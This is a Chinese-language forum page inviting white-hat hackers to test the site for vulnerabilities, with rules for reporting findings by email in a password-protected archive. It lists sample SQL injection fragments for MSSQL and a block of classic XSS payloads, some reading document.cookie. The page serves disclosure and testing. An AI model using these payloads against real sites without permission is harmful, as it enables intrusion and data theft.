允许所有白帽对本网站进行安全漏洞测试,不需要签任何合同。
二.测试流程
允许使用sql语句注入或xss注入或Cookie注入
Sql语句比如 :
and 1=2 and (select count(*) from sysobjects)>0 mssql ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0xss语句比如:
<script>alert('hello,gaga!');</script> //经典语句,哈哈! >"'><img src="javascript.:alert('XSS')"> >"'><script>alert('XSS')</script> <table background='javascript.:alert(([code])'></table> <object type=text/html data='javascript.:alert(([code]);'></object> "+alert('XSS')+" '><script>alert(document.cookie)</script> ='><script>alert(document.cookie)</script> <script>alert(document.cookie)</script> <script>alert(vulnerable)</script> <script>alert('XSS')</script> <img src="javascript:alert('XSS')"> %0a%0a<script>alert(\"Vulnerable\")</script>.jsp %3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e %3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e此类语句完全允许
完全允许使用
三.注入成功发现漏洞
请发送至邮箱hapuren@hapuren.cn
发完后请删除本地测试数据
所有测试的数据及漏洞压缩成rar 并且设置密码为hapurenweb?!
四.号被封了怎么办
只能怪你倒霉,自己再注册个新号吧。:.゚ヽ(*´∀`)ノ゚.:。
五.保密
测试后的数据严禁向任何第三方发送
不管是有意的还是无意的
如果你想发 联系qq754195502
得到同意后即可写成一份博客授权方 哈葡人互联
Powered by HadSky 8.4.10
©2015 - 2024 哈葡人互联论坛
您的IP:3.138.34.210,2024-10-16 22:19:15,Processed in 0.15877 second(s).